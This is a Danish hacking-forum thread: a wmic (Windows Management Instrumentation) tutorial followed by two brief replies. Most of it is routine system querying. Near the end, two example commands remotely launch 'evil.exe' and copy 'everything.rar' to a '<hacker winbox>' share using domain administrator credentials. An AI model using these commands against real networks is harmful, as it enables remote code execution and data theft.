WMI - Windows Management Instrumentation - Et par eksempler
|
24-05-2015, 19:40
(Denne besked var sidst ændret: 25-05-2015, 16:27 af iTick.)
|
|||
|
|||
WMI - Windows Management Instrumentation - Et par eksempler
Her er en lille "Få blod på tanden" - intro til WMI. Det er et kanon godt værktøj, til at administrere Windows med.
Jeg er ikke selv god til det, så det er også lidt en "note-to-selv". WMIC er WMI command & scripting værktøj, der man mere end lidt af hvert. Uden at vide det, tror jeg det er meget overset, lige som Powershell og VBScripting. Det er selvfølgelig også interessant, hvis man får en shell på en windows maskine. Arbejde med brugere: Jeg opretter først en bruger ned "net", for at have noget at arbejde med. Det kan sikkert gøres med WMI også. Citer:C:\Windows\system32>net user hacker hacker /comment:"Test user" /add Man kan også se, hvad man kan vælge at se, ud over Description, ved at bruge et wildcard: Citer:C:>wmic /node:127.0.0.1 USERACCOUNT WHERE Name="hacker" GET * Outputtet kan være lidt rodet, så man kan sætte en formatering på: Citer:C:\>wmic /node:127.0.0.1 USERACCOUNT WHERE Name="hacker" GET * /Format:list Man kan faktisk fjerne "/node:<ip>", men en af de smarte ting er, at man kan requeste disse informationer over lokalneværket. Citer:C:>wmic USERACCOUNT WHERE Name="hacker" GET * /Format:list En remote request ville se således ud: Citer:C:>wmic /user:administrator /password:<admin password> /node:10.0.0.2 USERACCOUNT WHERE Name="hacker" GET * Hvis man ønsker at se alle brugere, kan man bruge følgende: Citer:C:\>wmic Useraccount GET /ALL /Format:list Den bruger vi lavede før, kan slettes med: Citer:C:\Windows\system32>net user hacker /del Hvis man vil undersøge Eventloggen, kan man også det. Vi kan først lige lave et Informations-event under Applications: Citer:C:\Windows\system32>eventcreate /t information /l application /id 925 /d "Some Description" Det kan så undersøges med WMI med følgende: (Ja, det tager bare lang tid) Citer:C:\Windows\system32>wmic /node:127.0.0.1 NTEVENT WHERE EventIdentifier=925 GET Message Her kan man selvfølgelig også bruge * som wildcard, i stedet for Message, for at se alle felter. Yderligere kan man tilføje et output format: Citer:C:\>wmic NTEVENT WHERE EventIdentifier=925 GET * /Format:list Over netværk, ville det se således ud: Citer:wmic /user:administrator /password:<admin passowrd> /node:<ip> NTEVENT WHERE EventIdentifier=925 Get * /Format:list Man kan også lave sub-queries: Citer:C:\>wmic process WHERE (Caption="svchost.exe" AND ThreadCount=10) GET * /format:list Som i kan se, får man hurtigt rigtig meget output. Man kan så vælge at sende output til en fil, i et bestemt format, ved hjælp af "/Format:" og "/output:". Nedenstående smider outputtet i filen svc.html, og som i kan se ud af /format:, så ER indholdet faktisk i html format. Citer:C:>wmic /output:svc.html process where (Caption="svchost.exe" AND ThreadCount=10) get * /format:hformOutput filen kan så åbnes i din favorit browser med "file:///C:/svc.html". Man kan også se maskinens patchlevel: Citer:C:\>wmic qfe GET description,installedOn /format:list Hvis man synes det er bedre, kan man sende dette output ud på skærmen i cvs format: Citer:C:\>wmic qfe GET description,installedOn /format:csv Eller evt. til en fil, med argumentet "/Output", som vi så før. Vil man se udvalgte informationer om operativsystems processer, kan man prøve følgende: Citer:C:\>wmic Process GET caption,executablepath,commandline /Format:list Som altid, kan man se de felter man ønsker. Hvis man vil se det hele, kan man bruge * som et wildcard. Man kan også se services med WMI. Her ses den fulde sti til den ekesekverbare fil: Citer:C:\Windows\system32>wmic.exe service GET pathname Man kan også se alle services, formateret i en liste: Citer:C:\>wmic.exe service GET * /Format:list Her ses et udvalg af kolonner, formateret som en tabel: Citer:C:\Windows\system32>wmic.exe service GET ProcessId,Caption /Format:table Man kan også starte nye processer. Ser ses, hvordan ping startes. Selve outputtet vil poppe op i et nyt kommandoprompt vindue: Citer:C:\>wmic.exe process call create "ping -t google.dk" Så man man overveje hvad man kan bruge følgende til: Citer:C:>wmic /NODE:<ip> process CALL create “evil.exe” Eller måske: Citer:C:>wmic /NODE:<ip> /user:”Domain\Administrator” /password:<password> process CALL create “xcopy “C:\\everything.rar” “\\<hacker winbox>\\C$\\everything.rar” Man kan også se hvad for noget software, der er installeret på maskinen: Citer:C:\Windows\system32>wmic product list brief Eller de ting, der starter automatisk på maskinen: Citer:C:\Windows\system32>wmic startup list brief Oversigt over partitioner: Citer:C:\Windows\system32>wmic partition get name,bootable,size,type Oversigt over diskdrev: Citer:C:\Windows\system32>wmic diskdrive get name,size,model Informationer om netkort: Citer:C:\Windows\system32>wmic nic get macaddress,description Man kan også bruge WMIs prompt, ved at skrive "wmic" uden noget andet. Citer:C:\Windows\System32>wmic Links: http://en.wikipedia.org/wiki/Windows_Man...umentation
---
Writing a shellcode decoder stub in assembly is like talking gibberish in such a way that it is still perfectly intelligible. - iTick |
|||
24-05-2015, 20:44
|
|||
|
|||
RE: WMI Windows Management Instrumentation - Et par eksempler
Yes wmic kan bruges til en masse godt. Kunne godt være man kunne bruge den noget mere i forbindelse med scripting end jeg gør.
Btw. Mens vi er ved windows scripting, tror du vil kunne lide denne: http://blakhal0.blogspot.dk/2015/03/wind...s.html?m=1
Don't learn to hack, hack to learn
|
|||
24-05-2015, 20:53
|
|||
|
|||
RE: WMI - Windows Management Instrumentation - Et par eksempler
(24-05-2015, 20:44)Spagnum Skrev: Btw. Mens vi er ved windows scripting, tror du vil kunne lide denne: Hehe, nice. Det har jeg ikke set før. Det skal jeg helt sikkert lege med. :)
---
Writing a shellcode decoder stub in assembly is like talking gibberish in such a way that it is still perfectly intelligible. - iTick |
|||
|
User(s) browsing this thread: 1 Gæst(er)